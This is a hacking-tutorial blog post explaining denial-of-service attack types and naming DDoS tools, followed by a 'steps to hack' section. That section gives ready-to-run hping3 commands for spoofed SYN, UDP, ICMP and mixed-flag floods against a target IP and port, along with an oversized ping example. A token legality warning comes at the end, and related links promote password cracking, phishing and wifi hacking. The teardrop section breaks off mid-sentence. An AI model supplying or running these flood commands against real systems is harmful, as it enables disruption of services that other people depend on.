What is DOS attack and how to Hack using DOS

1
650

DOS Attack: DENIAL OF SERVICE ATTACK

Guys,you may have seen Mr. Robot and remember the event when Fsociety use the DDoS as a calling card to lure Elliot into helping them take down E-Corp or you may have been struck in situation when you try to open a Website  only to see a notification that Website is down. What is this? Yes, this is a DOS Attack.




A denial of service (DoS) attack is an attack that clogs up so much memory on the target system that it can not serve it’s users, or it causes the target system to crash, reboot, or otherwise deny services to legitimate users.There are several different kinds of dos attack as discussed below:-

1) Ping Of Death :- The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it’s commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.

2) Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another
3) SYN – Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems’ memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

4) Land Attack :- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.

5) Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.
Result:- Performance may be degraded such that the victim, the victim and intermediary networks become congested and unusable, i.e. clogging the network and preventing legitimate users from obtaining network services.

6) UDP – Flood Attack :- Two UDP services: echo (which echos back any character received) and chargen (which generates character) were used in the past for network testing and are enabled by default on most systems. These services can be used to launch a DOS attack by connecting the chargen to echo ports on the same or another machine and generating large amounts of network traffic.

Distributed Denial Of Service (DDoS) :- In Distributed DoS attack, there are 100 or more different attackers (systems) attacking the single system. Due to higher number of attackers DDoS attack is more effective and dangerous than regular DoS attack. The attackers have control over master zombies, which, in turn, have control over slave zombies, as shown in figure.

No system connected to the internet is safe from DDoS attacks. All platforms, including Unix and Windows NT, are vulnerable to such attacks. Even Mac OS machines have been used to conduct DDoS attacks.

The most popular DDoS and dos attack tools are:-

a) Trin00 (WinTrinoo)
b) Tribe Flood Network (TFN) (TFN2k)
c) Shaft
d) LOIC(LOW ORBIT ION CANNON)
e) XOIC

No softwares, you wanna try it yourself, you can use HPING(comes preinstalled in KALI LINUX).

OR

Download hping from www.hping.org

Steps to hack using DOS attack:

Open the console and go to the path of hping3 and give the following command.

hping3 –rand-source –S –L 0 –p <target port> <target IP>

Here we are sending SYN packets (set value by replacing 0) with a random source.

hping3 –rand-source –SA –p <open port> <target IP>

Here we are sending SYN + ACK packets from a random source.

hping3 –rand-source -–udp <target IP> –flood

Flooding the target IP with UDP packets.

hping3 –rand-source –SAFRU –L 0 –M 0 –p <port> <target> –flood

In this command, we are sending SYN+ACK+FIN+RST+URG packets with TCP ack (-L) and TCP seq (-M). Change the values after -L and -M.

hping3 –icmp –spoof –flood

Flooding with ICMP packets by spoofed IP (–spoof).

WARNING: IT IS ILLEGAL TO DOS attack A COMPUTER NETWORK NOT OWNED BY YOU. TRY IT IN YOUR OWN NETWORK ONLY.

Related Post

Phishing Attack using Kali Linux: Hack Passwords, ... Phishing Attack using Kali Linux Other Kali Linux Tutorials: How to install Kali Linux Hack WIFI using Kali Linux //
Top 10 Hacking and Security apps for Android Smartphones have became most popular gadgets nowadays and it is been used by almost everyone. People are now utilizing their smartphones for most of t...
Cracking Password using Cain and Abel Cracking Password using Cain and Abel Sniffer: This is the fourth tutorial of Cain and Abel. In this tutorial we will know more about the password sn...
Easy Steps to Hack Wifi using Wireshark Trick to Hack Wifi using Wireshark. Hello Friends. In this post, we will discuss the methods through which we can hack wifi using Wireshark. It is re...
Download Fgdump Crack Password Cracker for Free fgdump is a newer version of the pwdump tool for extracting NTLM and LanMan password hashes from Windows. fgdump is capable of running in the presence...
Download Superscan Intrusion Detection Tool for Fr... Superscan is a free port scanner compatible with Windows operating system. This is also the only port scanner with closed-source. Superscan contains f...
Download Cloudcracker WiFi hacking Software Download Cloudcracker WiFi hacking Software:  Cloudcracker is an online wifi password cracker service used to crack most of the wifi passwords using h...
How to Hack WiFi Password Using AndroDumpper (for ... Hack WiFi Password Using AndroDumpper: AndroDumpper is an Android app that can hack wifi password with WPA or WPA2 password (WPS enabled). It is easil...

1 COMMENT

LEAVE A REPLY